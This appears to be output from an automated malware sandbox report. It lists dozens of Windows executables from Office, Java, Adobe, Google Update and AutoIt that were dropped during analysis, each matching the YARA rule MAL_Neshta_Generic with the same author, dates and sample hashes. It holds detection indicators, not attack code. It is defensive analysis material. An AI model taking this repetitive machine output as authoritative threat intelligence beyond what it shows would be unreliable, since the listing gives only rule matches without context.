          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Windows\svchost.com, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
